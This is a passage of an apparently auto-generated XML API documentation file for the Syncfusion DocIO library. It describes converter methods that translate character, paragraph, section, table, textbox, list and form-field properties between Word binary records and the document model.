            <param name="value">The value.</param>
            <param name="charProps">The char props.</param>
            <param name="charFormat">The char format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CharacterPropertiesConverter.RemovePicLocationSprm(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            Removes the pic location SPRM.
            </summary>
            <param name="sprms">The SPRMS.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CharacterPropertiesConverter.RemoveIncorrectSprms(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray,System.Boolean)">
            <summary>
            Removes the incorrect SPRMs
            </summary>
            <param name="sprms">The SPRMs</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CharacterPropertiesConverter.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ParagraphPropertiesConverter">
            <summary>
            Summary description for class ParagraphPropertiesConverter
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphPropertiesConverter.ExportBorder(Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode,Syncfusion.DocIO.DLS.Border)">
            <summary>
            
            </summary>
            <param name="srcBorder"></param>
            <param name="destBorder"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphPropertiesConverter.ImportBorder(Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode,Syncfusion.DocIO.DLS.Border)">
            <summary>
            
            </summary>
            <param name="destBorder"></param>
            <param name="srcBorder"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphPropertiesConverter.ExportTabs(Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo,Syncfusion.DocIO.DLS.TabCollection)">
            <summary>
            
            </summary>
            <param name="info"></param>
            <param name="tabs"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphPropertiesConverter.GetDestBorders(Syncfusion.DocIO.DLS.Borders,Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            
            </summary>
            <param name="destBorders"></param>
            <param name="destination"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphPropertiesConverter.Export(Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties,Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Exports the specified source.
            </summary>
            <param name="source">The source.</param>
            <param name="destination">The destination.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphPropertiesConverter.Import(Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties,Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Imports the specified destination.
            </summary>
            <param name="destination">The destination.</param>
            <param name="source">The source.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphPropertiesConverter.ImportGridBeforeAfter(Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties,Syncfusion.DocIO.DLS.WTableRow)">
             <summary>
            Imports GridBefore and GridAfter properties of the table row
             </summary>
             <param name="destination">The destination.</param>
             <param name="source">The source.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphPropertiesConverter.Import(Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties,Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            Imports the table row properties to paragraph.
            </summary>
            <param name="destination">The destination.</param>
            <param name="source">The source.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphPropertiesConverter.FormatToProp(System.Int32,System.Object,Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties,Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Formats to prop.
            </summary>
            <param name="propKey">The prop key.</param>
            <param name="value">The value.</param>
            <param name="destination">The destination.</param>
            <param name="source">The source.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphPropertiesConverter.ImportTabs(Syncfusion.DocIO.DLS.TabCollection,Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties)">
            <summary>
            Imports the tabs.
            </summary>
            <param name="tabCollection">The tab collection.</param>
            <param name="destination">The destination.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphPropertiesConverter.ImportShading(Syncfusion.DocIO.DLS.WParagraphFormat,Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties)">
            <summary>
            Imports the shading.
            </summary>
            <param name="source">The source.</param>
            <param name="destination">The destination.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphPropertiesConverter.ImportBorders(Syncfusion.DocIO.DLS.Borders,Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties)">
            <summary>
            Imports the borders.
            </summary>
            <param name="borders">The borders.</param>
            <param name="destination">The destination.</param>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.SectionPropertiesConverter">
            <summary>
            Summary description for class SectionPropertiesConverter
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SectionPropertiesConverter.Export(Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties,Syncfusion.DocIO.DLS.WSection,System.Boolean)">
            <summary>
             Exports formatting from SectionProperties to ISection's PageSettings
            </summary>
            <param name="source">Source properties</param>
            <param name="destination">Destination.</param>
            <param name="parseAll">Prase All.</param>  
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SectionPropertiesConverter.UpdatePageOrientation(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray,Syncfusion.DocIO.DLS.WPageSetup)">
            <summary>
            Update the page orientation to portrait if the corresponding sprm is not found.
            </summary>
            <param name="sprms"></param>
            <param name="pageSetup"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SectionPropertiesConverter.Import(Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionProperties,Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Imports formatting from WParagraphFormat to SectionProperties
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SectionPropertiesConverter.ExportBorder(Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode,Syncfusion.DocIO.DLS.Border)">
            <summary>
            
            </summary>
            <param name="srcBorder"></param>
            <param name="destBorder"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SectionPropertiesConverter.ImportBorder(Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode,Syncfusion.DocIO.DLS.Border)">
            <summary>
            
            </summary>
            <param name="destBorder"></param>
            <param name="srcBorder"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SectionPropertiesConverter.GetDestBorders(Syncfusion.DocIO.DLS.Borders,Syncfusion.DocIO.DLS.WPageSetup)">
            <summary>
            
            </summary>
            <param name="destBorders"></param>
            <param name="destination"></param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TablePropertiesConverter">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.Export(Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties,Syncfusion.DocIO.DLS.RowFormat)">
            <summary>
            Exports the specified source.
            </summary>
            <param name="source">The source.</param>
            <param name="destination">The destination.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.Import(Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties,Syncfusion.DocIO.DLS.RowFormat)">
            <summary>
            Imports the specified destination.
            </summary>
            <param name="destination">The destination.</param>
            <param name="source">The source.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.ExportBorders(Syncfusion.DocIO.ReaderWriter.Biff_Records.TableBorders,Syncfusion.DocIO.DLS.Borders)">
            <summary>
            Exports the borders.
            </summary>
            <param name="srcBorders">The source borders.</param>
            <param name="destBorders">The destination borders.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.FormatToProp(System.Int32,Syncfusion.DocIO.DLS.RowFormat,Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor,Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            Converts format to property.
            </summary>
            <param name="propertyKey">The property key.</param>
            <param name="rowFormat">The row format.</param>
            <param name="destination">The destination.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.FormatToProp(System.Int32,Syncfusion.DocIO.DLS.CellFormat,Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor,System.Int32)">
            <summary>
            Converts CellFormat to TableRowDescriptor properties.
            </summary>
            <param name="propertyKey">The property key.</param>
            <param name="cellFormat">The cell format.</param>
            <param name="destination">The destination.</param>
            <param name="cellIndex">Index of the cell.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.ImportCellsWidth(Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor,Syncfusion.DocIO.DLS.WTableRow,Syncfusion.DocIO.DLS.IWSection)">
            <summary>
            Imports the width of the cells.
            </summary>
            <param name="rowDescr">The row descr.</param>
            <param name="row">The row.</param>
            <param name="section">The section.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.BorderToBRC(Syncfusion.DocIO.DLS.Border,Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode)">
            <summary>
            
            </summary>
            <param name="border"></param>
            <param name="brc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.BorderToBRC(Syncfusion.DocIO.DLS.Border,Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BorderStructure)">
            <summary>
            
            </summary>
            <param name="border"></param>
            <param name="brc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.BRCToBorder(Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode,Syncfusion.DocIO.DLS.Border)">
            <summary>
            
            </summary>
            <param name="brc"></param>
            <param name="border"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.BRCToBorder(Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BorderStructure,Syncfusion.DocIO.DLS.Border)">
            <summary>
            
            </summary>
            <param name="brc"></param>
            <param name="border"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.IsEmpty(Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BorderStructure)">
            <summary>
            Determines whether the specified BRC is empty.
            </summary>
            <param name="brc">The BRC.</param>
            <returns>
            	If the specified BRC is empty, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.ImportPaddings(Syncfusion.DocIO.ReaderWriter.Biff_Records.Spacings,Syncfusion.DocIO.DLS.Paddings)">
            <summary>
            Imports the paddings.
            </summary>
            <param name="destination">The destination.</param>
            <param name="source">The source.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.ExportPaddings(Syncfusion.DocIO.ReaderWriter.Biff_Records.Spacings,Syncfusion.DocIO.DLS.Paddings)">
            <summary>
            Exports the paddings.
            </summary>
            <param name="source">The source.</param>
            <param name="destination">The destination.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.ExportCellBorderColors(Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor,Syncfusion.DocIO.DLS.Borders)">
            <summary>
            Exports the border colors.
            </summary>
            <param name="cellDescr">The cell descr.</param>
            <param name="destBorders">The destination borders.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.ExportCellBorders(Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor,Syncfusion.DocIO.DLS.Borders)">
            <summary>
            Exports the cell borders.
            </summary>
            <param name="cellDescr">The cell descr.</param>
            <param name="destBorders">The dest borders.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.ExportCellBorderType(System.Byte[],Syncfusion.DocIO.DLS.Borders,System.Int32)">
            <summary>
            Exports the type of the cell border.
            </summary>
            <param name="brTypeArray">The border type array.</param>
            <param name="destBorders">The destination borders.</param>
            <param name="startIndex">The start index.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.ImportCellBorders(Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor,Syncfusion.DocIO.DLS.Borders)">
            <summary>
            Imports the cell borders.
            </summary>
            <param name="cellDescr">The cell descr.</param>
            <param name="srcBorders">The SRC borders.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.ImportCellBorderColors(Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor,Syncfusion.DocIO.DLS.Borders)">
            <summary>
            Imports the color of the cell border.
            </summary>
            <param name="cellDescr">The cell descr.</param>
            <param name="srcBorders">The source borders.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.ImportCellSpacing(System.Single,Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            Imports the cell spacing.
            </summary>
            <param name="cellSpacing">The cell spacing.</param>
            <param name="sprms">The SPRMS.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.ImportLeftIndent(System.Single,Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            Imports the left indent.
            </summary>
            <param name="leftIndent">The left indent.</param>
            <param name="sprms">The SPRMS.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.ImportRowHeight(Syncfusion.DocIO.DLS.RowFormat,Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            Imports the height of the row.
            </summary>
            <param name="rowFormat">The row format.</param>
            <param name="sprms">The sprms.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.GetSprm(System.Int32,Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            Gets the SPRM.
            </summary>
            <param name="option">The option.</param>
            <param name="sprms">The SPRMS.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.ImportPositioning(Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor,Syncfusion.DocIO.DLS.RowFormat.TablePositioning)">
            <summary>
            Imports the positioning.
            </summary>
            <param name="destination">The destination.</param>
            <param name="source">The source.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.ExportPositioning(Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor,Syncfusion.DocIO.DLS.RowFormat.TablePositioning)">
            <summary>
            Exports the positioning.
            </summary>
            <param name="source">The source.</param>
            <param name="destination">The destination.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.Export(Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor,Syncfusion.DocIO.DLS.WTableRow,System.Boolean)">
            <summary>
            Exports formatting from SectionProperties to ISection's PageSettings
            </summary>
            <param name="sourceDescriptor">The source descriptor.</param>
            <param name="destination">The destination.</param>
            <param name="parseAll">if it is parse all, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.Export(Syncfusion.DocIO.ReaderWriter.Biff_Records.TableBorders,Syncfusion.DocIO.DLS.RowFormat,Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            Exports formatting
            </summary>
            <param name="source">The source.</param>
            <param name="tableFormat">The table format.</param>
            <param name="destRow">The dest row.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.ExportCellsWidth(Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor,Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            Exports the width of the cells.
            </summary>
            <param name="rowDescr">The row descr.</param>
            <param name="row">The row.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.Import(Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor,Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            Imports formatting from WTableRow to TableRowDescriptor
            </summary>
            <param name="destination">The destination.</param>
            <param name="source">The source.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TablePropertiesConverter.Import(Syncfusion.DocIO.ReaderWriter.Biff_Records.TableBorders,Syncfusion.DocIO.DLS.RowFormat)">
            <summary>
            Imports formatting
            </summary>
            <param name="destination">The destination.</param>
            <param name="srcTable">The SRC table.</param>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TextBoxPropertiesConverter">
            <summary>
            Property convertor for textboxes
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBoxPropertiesConverter.Export(Syncfusion.DocIO.ReaderWriter.DataStreamParser.TextBoxProps,Syncfusion.DocIO.DLS.WTextBoxFormat)">
            <summary>
            Export properties from TextBoxProps to TextBoxFormat.
            </summary>
            <param name="txbxProps">TextBoxProps item.</param>
            <param name="txbxFormat">TextBoxFormat item.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBoxPropertiesConverter.Import(Syncfusion.DocIO.DLS.WTextBoxFormat,Syncfusion.DocIO.ReaderWriter.DataStreamParser.TextBoxProps)">
            <summary>
            Import properties from TetxBoxFormat to TextBoxProps.
            </summary>
            <param name="txbxFormat">The TXBX format.</param>
            <param name="txbxProps">The TXBX props.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBoxPropertiesConverter.Export(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress,Syncfusion.DocIO.DLS.WTextBoxFormat,System.Boolean)">
            <summary>
            Exports data from textbox container to the specified WTextboxFormat object.
            </summary>
            <param name="txbxContainer">The textbox container.</param>
            <param name="fspa">The fspa.</param>
            <param name="txbxFormat">The textbox format.</param>
            <param name="skipPositionOrigins">The skip position origins.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBoxPropertiesConverter.Import(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress,Syncfusion.DocIO.DLS.WTextBoxFormat)">
            <summary>
            Imports data from WTextboxFormat to FileShapeAddress.
            </summary>
            <param name="fspa">The fspa.</param>
            <param name="txbxFormat">The textbox format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBoxPropertiesConverter.ExportPosition(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer,Syncfusion.DocIO.DLS.WTextBoxFormat)">
            <summary>
            Exports the shape position.
            </summary>
            <param name="txbxContainer">The textbox container.</param>
            <param name="txbxFormat">The textbox format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBoxPropertiesConverter.ExportIntMargin(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer,Syncfusion.DocIO.DLS.WTextBoxFormat)">
            <summary>
            Exports the internal margin.
            </summary>
            <param name="txbxContainer">The textbox container.</param>
            <param name="txbxFormat">The textbox format.</param>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ListPropertiesConverter">
            <summary>
            Summary description for class ListPropertiesConverter
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListPropertiesConverter.Export(Syncfusion.DocIO.DLS.WListFormat,Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Export paragraphs's list data to ListStyle
            </summary>
            <param name="listFormat">WListFormat item</param>
            <param name="reader">Current reader</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListPropertiesConverter.Export(System.Int32,System.Int32,Syncfusion.DocIO.DLS.WListFormat,Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Export paragraphs's list data to ListStyle
            </summary>
            <param name="formatIndex">Index of the format.</param>
            <param name="levelIndex">Index of the level.</param>
            <param name="listFormat">WListFormat item</param>
            <param name="reader">Current reader</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListPropertiesConverter.UpdateListStyleForInvalidListId(Syncfusion.DocIO.DLS.WListFormat,System.Int32,System.Int32)">
            <summary>
            Update list format for invalid list Id
            </summary>
            <param name="listFormat">The list format</param>
            <param name="id">List id</param>
            <param name="levelIndex">Level Index</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListPropertiesConverter.UpdateListType(Syncfusion.DocIO.DLS.ListStyle)">
            <summary>
            Updates the type of the list style.
            </summary>
            <param name="listStyle">The list style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListPropertiesConverter.UpdateStyleName(Syncfusion.DocIO.DLS.ListStyle)">
            <summary>
            Updates the name of the list style.
            </summary>
            <param name="listStyle">The list style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListPropertiesConverter.Import(Syncfusion.DocIO.DLS.ListStyle,Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData,Syncfusion.DocIO.ReaderWriter.WordStyleSheet)">
            <summary>
            Import ListStyle to ListData.
            </summary>
            <param name="lstStyle">Source ListStyle</param>
            <param name="listFormat">Destination ListData</param>
            <param name="styleSheet">Stylesheet</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListPropertiesConverter.ExportListFormat(Syncfusion.DocIO.DLS.WListFormat,Syncfusion.DocIO.ReaderWriter.WordReaderBase,System.Int32,Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData,System.Int32)">
            <summary>
            Exports the list format.
            </summary>
            <param name="listFormat">The list format.</param>
            <param name="reader">The reader.</param>
            <param name="id">The list id.</param>
            <param name="listData">The list data.</param>
            <param name="levelIndex">Index of the level.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListPropertiesConverter.ExportNewListFormat(Syncfusion.DocIO.DLS.WListFormat,Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Exports the new list format.
            </summary>
            <param name="listFormat">The list format.</param>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListPropertiesConverter.ExportListStyle(Syncfusion.DocIO.DLS.WListFormat,Syncfusion.DocIO.ReaderWriter.WordReaderBase,System.Int32,Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData)">
            <summary>
            Exports the list style to the document.
            </summary>
            <param name="listFormat">The list format.</param>
            <param name="reader">The reader.</param>
            <param name="id">The id.</param>
            <param name="listData">The list data.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListPropertiesConverter.ExportToListLevelCollection(Syncfusion.DocIO.ReaderWriter.Biff_Records.ListLevels,Syncfusion.DocIO.DLS.ListLevelCollection,Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Export ListLevels to ListLevelCollection.
            </summary>
            <param name="lstLevels"></param>
            <param name="lstLevelCol"></param>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListPropertiesConverter.ExportToDLSListLevel(Syncfusion.DocIO.ReaderWriter.Biff_Records.ListLevel,Syncfusion.DocIO.DLS.WListLevel,Syncfusion.DocIO.ReaderWriter.WordReaderBase,System.Int32)">
            <summary>
            Convert DocIO listlevel to DLS listlevel.
            </summary>
            <param name="docListLevel"></param>
            <param name="dlsListLevel"></param>
            <param name="reader"></param>
            <param name="levelNumber"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListPropertiesConverter.ImportToDocListLevel(Syncfusion.DocIO.DLS.WListLevel,Syncfusion.DocIO.ReaderWriter.Biff_Records.ListLevel,Syncfusion.DocIO.ReaderWriter.WordStyleSheet,System.Int32)">
            <summary>
            Import data from DLS ListLevel format to 
            DocIO ListLevel format.
            </summary>
            <param name="dlsListLevel">Source DLS ListLevel</param>
            <param name="docListLevel">Destination DocIO ListLevel</param>
            <param name="styleSheet">Stylesheet</param>
            <param name="levelIndex">Stylesheet</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListPropertiesConverter.CreateCharacterOffsets(System.String,System.Byte[]@)">
            <summary>
            Create list level character offsets
            </summary>
            <param name="numStr"></param>
            <param name="characterOffsets"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListPropertiesConverter.IsBulletPatternType(Syncfusion.DocIO.ReaderWriter.Biff_Records.ListLevels)">
            <summary>
            
            </summary>
            <param name="levels"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListPropertiesConverter.CheckListCollection(System.Int32,Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            
            </summary>
            <param name="listId"></param>
            <param name="listFormat"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListPropertiesConverter.UseBaseListStyle(Syncfusion.DocIO.ReaderWriter.IWordReaderBase)">
            <summary>
            Does current list uses base style?
            </summary>
            <param name="reader"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListPropertiesConverter.ExportListFormatOverrides(System.Int32,Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverride,Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Export list format overrides.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListPropertiesConverter.ExportListOverride(Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverride,Syncfusion.DocIO.DLS.ListOverrideStyle,Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Exports the list override.
            </summary>
            <param name="sourceLfo">The source lfo.</param>
            <param name="listOverrideStyle">The list override style.</param>
            <param name="reader">The reader.</param>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListPropertiesConverter.ImportListOverride(Syncfusion.DocIO.DLS.ListOverrideStyle,Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverride,Syncfusion.DocIO.ReaderWriter.WordStyleSheet)">
            <summary>
            
            </summary>
            <param name="listOverrideStyle"></param>
            <param name="lfo"></param>
            <param name="styleSheet"></param>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.FormFieldPropertiesConverter">
            <summary>
            Summary description for class FormFieldPropertiesConverter
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormFieldPropertiesConverter.ReadFormFieldProperties(Syncfusion.DocIO.DLS.WFormField,Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField)">
            <summary>
            Reads the form field properties.
            </summary>
            <param name="formField">The form field.</param>
            <param name="frmField">The FRM field.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormFieldPropertiesConverter.WriteFormFieldProperties(Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField,Syncfusion.DocIO.DLS.WFormField)">
            <summary>
            Writes the form field properties.
            </summary>
            <param name="frmField">The FRM field.</param>
            <param name="formField">The form field.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormFieldPropertiesConverter.GetTextFormat(System.String)">
            <summary>
            Gets the text format.
            </summary>
            <param name="formFieldFormat">The form field format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormFieldPropertiesConverter.GetStringTextFormat(Syncfusion.DocIO.DLS.WTextFormField)">
            <summary>
            Gets the string text format.
            </summary>
            <param name="formField">The form field.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormFieldPropertiesConverter.GetNumberFormat(System.String)">
            <summary>
            Gets the number format.
            </summary>
            <param name="formFieldFormat">The form field format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormFieldPropertiesConverter.GetStringNumberFormat(Syncfusion.DocIO.DLS.NumberFormat)">
            <summary>
            Gets the string number format.
            </summary>
            <param name="numberFormat">The number format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormFieldPropertiesConverter.GetDefaultNumberValue(Syncfusion.DocIO.DLS.NumberFormat)">
            <summary>
            Gets the default number values.
            </summary>
            <param name="numberFormat">The number format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormFieldPropertiesConverter.FormatText(Syncfusion.DocIO.DLS.TextFormat,System.String)">
            <summary>
            Formats the text.
            </summary>
            <param name="textFormat">The text format.</param>
            <param name="text">The text.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormFieldPropertiesConverter.FormatNumberText(System.String,Syncfusion.DocIO.DLS.NumberFormat,System.String)">
            <summary>
            Formats the number text.
            </summary>
            <param name="format">The format.</param>
            <param name="numberFormat">The number format.</param>
            <param name="inputData">The input data.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormFieldPropertiesConverter.ConvertNumberToString(System.String,System.Double)">
            <summary>
            Convert input value to a formatted string .
            </summary>
            <param name="format">The format.</param>
            <param name="dValue">Input value.</param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.XmlParagraphItem">
            <summary>
            Summary description for XmlParagraphItem.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XmlParagraphItem.#ctor(System.IO.Stream,Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.XmlParagraphItem"/> class.
            </summary>
            <param name="xmlNode">The XML node.</param>
            <param name="wordDocument">The word document.</param>
        </member>
